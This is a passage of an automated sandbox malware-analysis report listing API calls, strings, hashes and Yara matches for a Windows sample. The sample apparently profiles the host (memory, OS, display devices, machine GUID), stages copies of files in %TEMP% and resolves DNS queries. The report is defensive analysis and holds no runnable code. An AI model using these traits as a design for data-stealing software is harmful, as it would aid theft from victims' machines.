              • Opcode Fuzzy Hash: a533093bf643e2750fc0c7fb6ce1a8cee2193e72f340cc35e9b9a59fd34ff9a9
              • Instruction Fuzzy Hash: F11193B17843907ED715AB669CD1B927B969745708F50807BF100BA2F1C73DA840CF5D
              APIs
              • __getptd.LIBCMT ref: 00431878
                • Part of subcall function 0042869D: __getptd_noexit.LIBCMT ref: 004286A0
                • Part of subcall function 0042869D: __amsg_exit.LIBCMT ref: 004286AD
              • __calloc_crt.LIBCMT ref: 00431883
                • Part of subcall function 0042B433: Sleep.KERNEL32(00000000,00423971,00000000), ref: 0042B45B
              • __lock.LIBCMT ref: 004318B9
              • ___addlocaleref.LIBCMT ref: 004318C5
              • __lock.LIBCMT ref: 004318D9
              • InterlockedIncrement.KERNEL32(?), ref: 004318E9
                • Part of subcall function 00425F69: __getptd_noexit.LIBCMT ref: 00425F69
              Memory Dump Source
              • Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd
              Similarity
              • API ID: __getptd_noexit__lock$IncrementInterlockedSleep___addlocaleref__amsg_exit__calloc_crt__getptd
              • String ID:
              • API String ID: 3803058747-0
              • Opcode ID: 70867ea875173e1f7dd9969e88531944267e4a1a24b45398618f5ded469c5ce0
              • Instruction ID: d223db73b8d1a923083aa51fa87a399d57b8196510375e44380c67d35a6f758e
              • Opcode Fuzzy Hash: 70867ea875173e1f7dd9969e88531944267e4a1a24b45398618f5ded469c5ce0
              • Instruction Fuzzy Hash: AC015E71A01724EAE720BFB6A80275D77A0EF08728FA0411FF9649A2D2CF7C59408A5D
              APIs
              • GetTickCount.KERNEL32 ref: 00410BFD
              • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410E58,?,.tmp,?,?,00000000,00410DA0,?,00000000,00410E20,?,00000000), ref: 00410C79
              • DeleteFileW.KERNEL32(00000000), ref: 00410DBE
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: File$CopyCountDeleteTick
              • String ID: %TEMP%$.tmp
              • API String ID: 2381671008-3650661790
              • Opcode ID: 4a067d1f8ba6d400319fcf7a723a146227050b837b1c7306f0a806063b549887
              • Instruction ID: 978216aeb9802c3a8092c63d781cd7ad87e87d7acf88f4e3b280f19958954086
              • Opcode Fuzzy Hash: 4a067d1f8ba6d400319fcf7a723a146227050b837b1c7306f0a806063b549887
              • Instruction Fuzzy Hash: 7C710C71A00109AFDB00EBD5DC42ADEBBB9EF48318F50447AF514F7292DA78AE458A58
              APIs
              • GetTickCount.KERNEL32 ref: 00410945
              • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410B9C,?,.tmp,?,?,00000000,00410AE8,?,00000000,00410B63,?,00000000), ref: 004109C1
              • DeleteFileW.KERNEL32(00000000), ref: 00410B06
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: File$CopyCountDeleteTick
              • String ID: %TEMP%$.tmp
              • API String ID: 2381671008-3650661790
              • Opcode ID: b6365babbb2d3b2e1b37703ec200a2ec6b79da26c3864396c2c11ec0f131d7bb
              • Instruction ID: 1e08b77d5c93ddd244bb37ca777f3c967e0d5c0e96542229b92685f54af29c93
              • Opcode Fuzzy Hash: b6365babbb2d3b2e1b37703ec200a2ec6b79da26c3864396c2c11ec0f131d7bb
              • Instruction Fuzzy Hash: DA710B71A04109AFDB00EF95DC41EDEBBB9EF48318F104476F514F72A2DA78AE458B58
              APIs
              • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
              • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B19
              • RegCloseKey.ADVAPI32(?,00402B3C,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B2F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: CloseOpenQueryValue
              • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
              • API String ID: 3677997916-4173385793
              • Opcode ID: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
              • Instruction ID: 9172d05214030136d6eeabac91fa7c92d03713ed8c8260d1a9efe939ba63eb8f
              • Opcode Fuzzy Hash: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
              • Instruction Fuzzy Hash: 04019275500308B9DB21AF908D46FAA7BB8D708700F600076BA04F66D0E7B8AA10979C
              APIs
              • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,00000000,0041660E,?,0041B0FC,?), ref: 004165AB
              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004165B1
                • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: AddressFreeLibraryLoadProcString
              • String ID: @$GlobalMemoryStatusEx$kernel32.dll
              • API String ID: 923276998-3878206809
              • Opcode ID: 85db832d693e486d1a61cee5b690b9a662077cbaa7453f9a7cd2e2dd296e1093
              • Instruction ID: ae4c68d41a3a4174a937c26ab83d8f0c6d254553f6270358502c1b43c0ddce29
              • Opcode Fuzzy Hash: 85db832d693e486d1a61cee5b690b9a662077cbaa7453f9a7cd2e2dd296e1093
              • Instruction Fuzzy Hash: A3018871A002086BD711EBA5DC42E8EB7BDEB88744F61413AF504B32D1E77CAD01855C
              APIs
              • GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process,?,?,004066D4,?,00417330,00000000,004175F4,?,Windows : ,?,,?,EXE_PATH : ,?), ref: 00406660
              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00406666
              • GetCurrentProcess.KERNEL32(?,00000000,kernel32.dll,IsWow64Process,?,?,004066D4,?,00417330,00000000,004175F4,?,Windows : ,?,,?), ref: 00406677
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: AddressCurrentHandleModuleProcProcess
              • String ID: IsWow64Process$kernel32.dll
              • API String ID: 4190356694-3024904723
              • Opcode ID: bb90ac27b46476fccc6d3856fb06f30bc2750b404d13dc0022771fe07b4660df
              • Instruction ID: ba80d2391f81007aa42feea1da534082dc1adbf3711fe3d895332dec38dcedd5
              • Opcode Fuzzy Hash: bb90ac27b46476fccc6d3856fb06f30bc2750b404d13dc0022771fe07b4660df
              • Instruction Fuzzy Hash: B0E06DB12143019EEB007EB58881A3B21C89B44305F130E3EA496F21C1E97EC8A0866D
              APIs
              • GetFileType.KERNEL32(?,?,?,00440488,0000000C), ref: 0042EA3A
              • GetLastError.KERNEL32(?,?,00440488,0000000C), ref: 0042EA44
              • __dosmaperr.LIBCMT ref: 0042EA4B
              • __alloc_osfhnd.LIBCMT ref: 0042EA6C
              • __set_osfhnd.LIBCMT ref: 0042EA96
              Memory Dump Source
              • Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd
              Similarity
              • API ID: ErrorFileLastType__alloc_osfhnd__dosmaperr__set_osfhnd
              • String ID:
              • API String ID: 43408053-0
              • Opcode ID: b5d169558445881238b3d156c4f27ab8e0aa30e32d4c1c84ee3f67fb1fef7cf2
              • Instruction ID: a5aaf9b701305fbf469fad5f25b8e8034a3286bd8ef1cfd879e4e61f2fcf1838
              • Opcode Fuzzy Hash: b5d169558445881238b3d156c4f27ab8e0aa30e32d4c1c84ee3f67fb1fef7cf2
              • Instruction Fuzzy Hash: C0210631B016259ACF119B6BE8053AA7B50BF46324F98824BE8748F2D3CB7C8941DF49
              APIs
              • _malloc.LIBCMT ref: 00430635
                • Part of subcall function 00425AEA: __FF_MSGBANNER.LIBCMT ref: 00425B03
                • Part of subcall function 00425AEA: __NMSG_WRITE.LIBCMT ref: 00425B0A
                • Part of subcall function 00425AEA: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00425B2F
              • _free.LIBCMT ref: 00430648
              Memory Dump Source
              • Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd
              Similarity
              • API ID: AllocateHeap_free_malloc
              • String ID:
              • API String ID: 1020059152-0
              • Opcode ID: e0bf7721241db337047a49e63f1d7736ca543470368040e1374fc4efe5aab102
              • Instruction ID: c3c700d70fdca2b708fba14eade6fb698b57cddcabcd3cbcdbac414ffce71832
              • Opcode Fuzzy Hash: e0bf7721241db337047a49e63f1d7736ca543470368040e1374fc4efe5aab102
              • Instruction Fuzzy Hash: 63112B32600621ABCB213B76BD16A1F3794DF88370F15122BFC55CA251DF3CC851869C
              APIs
              • __getptd.LIBCMT ref: 0042B30C
                • Part of subcall function 0042869D: __getptd_noexit.LIBCMT ref: 004286A0
                • Part of subcall function 0042869D: __amsg_exit.LIBCMT ref: 004286AD
              • __getptd.LIBCMT ref: 0042B323
              • __amsg_exit.LIBCMT ref: 0042B331
              • __lock.LIBCMT ref: 0042B341
              • __updatetlocinfoEx_nolock.LIBCMT ref: 0042B355
              Memory Dump Source
              • Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd
              Similarity
              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
              • String ID:
              • API String ID: 938513278-0
              • Opcode ID: 5e7c07f3ba6bce783e15daa034832957f209102ffa1da8a0b74f6172f75b8300
              • Instruction ID: 6ae8c60cd211180a8c43ced92eb17e901d77e809150f2ba35d6ecccb95a68be4
              • Opcode Fuzzy Hash: 5e7c07f3ba6bce783e15daa034832957f209102ffa1da8a0b74f6172f75b8300
              • Instruction Fuzzy Hash: ABF06231B05730DAD620BB66780675E6390AB00718FD1411FF954A62D2CF6C59419A9E
              APIs
              • GetTickCount.KERNEL32 ref: 00410EB4
              • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: CopyCountFileTick
              • String ID: %TEMP%$.tmp
              • API String ID: 3448371392-3650661790
              • Opcode ID: dcbd54fc4c37fa41d1f3def047f476980ec269fdbcef2be5238ae35c760609eb
              • Instruction ID: 0e4f139da3bc19c2096e57fedbffea1b6a0c7ee0d64fc6893e7b5a554fe936bc
              • Opcode Fuzzy Hash: dcbd54fc4c37fa41d1f3def047f476980ec269fdbcef2be5238ae35c760609eb
              • Instruction Fuzzy Hash: D0411F31904249AEDB01EBA1D852ACDBF79EF49308F50447BF500B76A3D67CAE458A58
              APIs
              • GetTickCount.KERNEL32 ref: 00410EB4
              • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: CopyCountFileTick
              • String ID: %TEMP%$.tmp
              • API String ID: 3448371392-3650661790
              • Opcode ID: b4051c86d89d16cbdd011401cb26392d540c890b59df4c5f9e00e45593a2b883
              • Instruction ID: 2c73a4ceecea9b7a55c8e1441bd033eb3759b1d2195d340dd4b2e4f4f6784083
              • Opcode Fuzzy Hash: b4051c86d89d16cbdd011401cb26392d540c890b59df4c5f9e00e45593a2b883
              • Instruction Fuzzy Hash: DF412131904149AFDB01FFA1D842ACDBBB9EF49318F50447BF500B36A2D67CAE458A58
              APIs
              • GetTickCount.KERNEL32 ref: 00410EB4
              • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: CopyCountFileTick
              • String ID: %TEMP%$.tmp
              • API String ID: 3448371392-3650661790
              • Opcode ID: fd3ed2e0f10af06c7055efab6d8518f1a7d31fde7c18b0f8517e5c88414f77f6
              • Instruction ID: 3bd2312418c75e2bfd4f88111c3886d823680ea6e83d1d6075c9c2a9f0993f15
              • Opcode Fuzzy Hash: fd3ed2e0f10af06c7055efab6d8518f1a7d31fde7c18b0f8517e5c88414f77f6
              • Instruction Fuzzy Hash: 4241013190410DAEDB01FFA1D842ADDBBB9EF49318F50447BF500B36A2D77DAE458A58
              APIs
              • GetTickCount.KERNEL32 ref: 00410BFD
              • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410E58,?,.tmp,?,?,00000000,00410DA0,?,00000000,00410E20,?,00000000), ref: 00410C79
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: CopyCountFileTick
              • String ID: %TEMP%$.tmp
              • API String ID: 3448371392-3650661790
              • Opcode ID: 3c9c793cbba2b1494e5bbcc8797dd77cc55da2a1b03f1701932884ea86e2c921
              • Instruction ID: ad1686550c7843c0884c0506788be05dc1fde737249d1bd281ecbc27d8194f8d
              • Opcode Fuzzy Hash: 3c9c793cbba2b1494e5bbcc8797dd77cc55da2a1b03f1701932884ea86e2c921
              • Instruction Fuzzy Hash: BF412330914109AEDB01FF91D952ADDBBBDEF49318F50447BF400B7292D77CAE458A58
              APIs
              • GetTickCount.KERNEL32 ref: 00410BFD
              • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410E58,?,.tmp,?,?,00000000,00410DA0,?,00000000,00410E20,?,00000000), ref: 00410C79
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: CopyCountFileTick
              • String ID: %TEMP%$.tmp
              • API String ID: 3448371392-3650661790
              • Opcode ID: 7e65eb29c14a11400a8ae9f9535f570905a72362550addcf7d14f60cf147a02b
              • Instruction ID: ab4a798e1dfa23648b03a2b2561a2af29de01fabf162149de749457abe37d48b
              • Opcode Fuzzy Hash: 7e65eb29c14a11400a8ae9f9535f570905a72362550addcf7d14f60cf147a02b
              • Instruction Fuzzy Hash: 37411331910109AEDB01FF92D952ADDBBBDEF48318F50447BF400B3292D77DAE458A58
              APIs
                • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
              • CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,0040DEAF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004148F8,00000001,00414C4C), ref: 0040DE38
              • DeleteFileW.KERNEL32(00000000,00000000,0040DEAF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004148F8,00000001,00414C4C,00000001,?), ref: 0040DE7A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: File$AllocCopyDeleteString
              • String ID: %TEMP%\curbuf.dat$LLA
              • API String ID: 5292005-3909751444
              • Opcode ID: 03760eacd4bf6eafee70f4f711e65bc97b6305d2d94ef0ca2e56f12b63379ea2
              • Instruction ID: d3139e3bb668dcd489f787ebceafddff3eb8ed9e6fe86914fc70b8a9fa006da4
              • Opcode Fuzzy Hash: 03760eacd4bf6eafee70f4f711e65bc97b6305d2d94ef0ca2e56f12b63379ea2
              • Instruction Fuzzy Hash: 3E21FC74D10509ABDB00FBE5C88299EB7B9AF54305F50857BF400B72D2D738AE058A99
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd
              Similarity
              • API ID: __calloc_crt
              • String ID: X D$h"D
              • API String ID: 3494438863-2552160841
              • Opcode ID: 28c858932b36068d7a04bc67a8e3b0624845a86d6d6cadb7adb530d3ac182b6a
              • Instruction ID: b158818b0811aef02535f2a4cc19cebd052bd56d44457835a3eb32c192543565
              • Opcode Fuzzy Hash: 28c858932b36068d7a04bc67a8e3b0624845a86d6d6cadb7adb530d3ac182b6a
              • Instruction Fuzzy Hash: C411E7327042219BF7148B1EBCC066263A5E7C47287A4413BE920CF2E1E738D892868E
              APIs
              • LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB1
              • GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 00417EB7
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID: DnsQuery_A$dnsapi.dll
              • API String ID: 2574300362-3847274415
              • Opcode ID: 724cfed19cb1d21381234b51a37364b79d38ba7da5abfef29c6bd78e431c9a57
              • Instruction ID: ee02e28701cd333fe80aa916ff0e932040e536dc5bff3800914b034e455f76c5
              • Opcode Fuzzy Hash: 724cfed19cb1d21381234b51a37364b79d38ba7da5abfef29c6bd78e431c9a57
              • Instruction Fuzzy Hash: A9115E71A08304AED711DBA9CC52B9EBBB8DB45704F5140A7E504E72D2D6789E018B58
              APIs
              • LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB1
              • GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 00417EB7
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID: DnsQuery_A$dnsapi.dll
              • API String ID: 2574300362-3847274415
              • Opcode ID: 50f0b7069414203643d559ff8c1b4067f618f2f1807c4d8d96e87e961dc54617
              • Instruction ID: 3ed38bd560de987a20526e09c97c4f2d359d7c1ce2b9a36b0a47fbdadc566110
              • Opcode Fuzzy Hash: 50f0b7069414203643d559ff8c1b4067f618f2f1807c4d8d96e87e961dc54617
              • Instruction Fuzzy Hash: 48113D71A08304AEDB11DBA9CD52B9EBBB8DB44714F5140BBF904E73D1D6789E018B58
              APIs
              • LoadLibraryA.KERNEL32(user32.dll,EnumDisplayDevicesW,00000000,0041670D,?,-00000001,0041B0FC,?,?,00416863,Video Info,?,004169AC,?,GetRAM: ,?), ref: 00416678
              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0041667E
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID: EnumDisplayDevicesW$user32.dll
              • API String ID: 2574300362-1693391355
              • Opcode ID: be31b090cf9e22f53fe63a2b9ccc94bb75e49f076f039a93db071de62ba29d85
              • Instruction ID: bffb8a391e8cbf63d1c0eded9315efc20e69fe0ee1e689c0aa8ff6c2638661ea
              • Opcode Fuzzy Hash: be31b090cf9e22f53fe63a2b9ccc94bb75e49f076f039a93db071de62ba29d85
              • Instruction Fuzzy Hash: 7E118970500618AFDB61EF61CC45BDABBBCEF84709F1140FAE508A6291D6789E848E58
              APIs
              • LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB1
              • GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 00417EB7
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID: DnsQuery_A$dnsapi.dll
              • API String ID: 2574300362-3847274415
              • Opcode ID: a19d4597b475aaa9ac328eaf6b87c7589b0a3e1b2296b7586c6c4fb46158065e
              • Instruction ID: 92d1eb556667ed81b8552bf9075b82756b3340621e6324b7cba7be93811987cb
              • Opcode Fuzzy Hash: a19d4597b475aaa9ac328eaf6b87c7589b0a3e1b2296b7586c6c4fb46158065e
              • Instruction Fuzzy Hash: 20111CB1A04304AED751DBAACD42B9FBBF8EB48714F5140B6F904E73C1E678DE418A58
              APIs
              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042EBD8
              • __isleadbyte_l.LIBCMT ref: 0042EC0B
              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,)7B,?), ref: 0042EC3C
              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,)7B,?), ref: 0042ECAA
              Memory Dump Source
              • Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd
              Similarity
              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
              • String ID:
              • API String ID: 3058430110-0
              • Opcode ID: d3eb6d498bf72d06f08981854be30ef5055412057725443a5c24876286db0bce
              • Instruction ID: d5fb20768fc2cd7e38da7f38bdfe34a942912e4a9a8a4cdf070304374513b48e
              • Opcode Fuzzy Hash: d3eb6d498bf72d06f08981854be30ef5055412057725443a5c24876286db0bce
              • Instruction Fuzzy Hash: 5F31D330B04266EFCB20DFA7E8809BA3BA5FF01310B5485AAF4658B291D335D940DB59
              APIs
              • RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
              • RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
              • LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
              • RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
              • String ID:
              • API String ID: 730355536-0
              • Opcode ID: 099da0d79779097dabcbbe4e17eced4135313adf81f8614c79238fcf2f8b4282
              • Instruction ID: 5328ea8a61f1b3c3886908a4d7eb6976bfaff4b38786c7c23389d9dab3a387f7
              • Opcode Fuzzy Hash: 099da0d79779097dabcbbe4e17eced4135313adf81f8614c79238fcf2f8b4282
              • Instruction Fuzzy Hash: 06015BB0684390AEE719AB6A9C967957F92D749704F05C0BFE100BA6F1CB7D5480CB1E
              APIs
              • RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,^), ref: 004024AF
              • RtlLeaveCriticalSection.KERNEL32(0041C5B4,00402524), ref: 00402517
                • Part of subcall function 00401870: RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
                • Part of subcall function 00401870: RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
                • Part of subcall function 00401870: LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
                • Part of subcall function 00401870: RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
              • String ID: ^
              • API String ID: 2227675388-551292248
              • Opcode ID: 36f5b8f16900d0e995ce4c5524c526641fb23a44d7305ae2e8247758f3247216
              • Instruction ID: 4ed45a5183fb1a6edd108f9af425bfacc088641811e0c18f6da98f6ec62fa594
              • Opcode Fuzzy Hash: 36f5b8f16900d0e995ce4c5524c526641fb23a44d7305ae2e8247758f3247216
              • Instruction Fuzzy Hash: 92113431700210AEEB25AB7A5F49B5A7BD59786358F20407FF404F32D2D6BD9C00825C
              APIs
              • __output_l.LIBCMT ref: 0042783E
                • Part of subcall function 00425F69: __getptd_noexit.LIBCMT ref: 00425F69
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd
              Similarity
              • API ID: __getptd_noexit__output_l
              • String ID: B
              • API String ID: 2141734944-1255198513
              • Opcode ID: febb268309658b2f8be58bfae30c55cbfe957b41178bad1dcf1cbf59c28180b6
              • Instruction ID: 99b51ff85c7b90f69104664c4d9504e165f5f5fb7a3773e46ce12f66d1d17e3f
              • Opcode Fuzzy Hash: febb268309658b2f8be58bfae30c55cbfe957b41178bad1dcf1cbf59c28180b6
              • Instruction Fuzzy Hash: 3C01C471A042299BDF00AFA5EC01BEE7BF4FB44364F50415AF824B6281D7389501CB79
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd
              Similarity
              • API ID: DecodePointer__invoke_watson
              • String ID: s[B
              • API String ID: 4034010525-1751886648
              • Opcode ID: 9aeacf2eaa45aa4d3a915217aa4e5a484a87f459dec0245bd515257041a31977
              • Instruction ID: 6fbffe8eda2b7a47f2c06d09d45c96a618974e1f3a447204240d23390952cdbc
              • Opcode Fuzzy Hash: 9aeacf2eaa45aa4d3a915217aa4e5a484a87f459dec0245bd515257041a31977
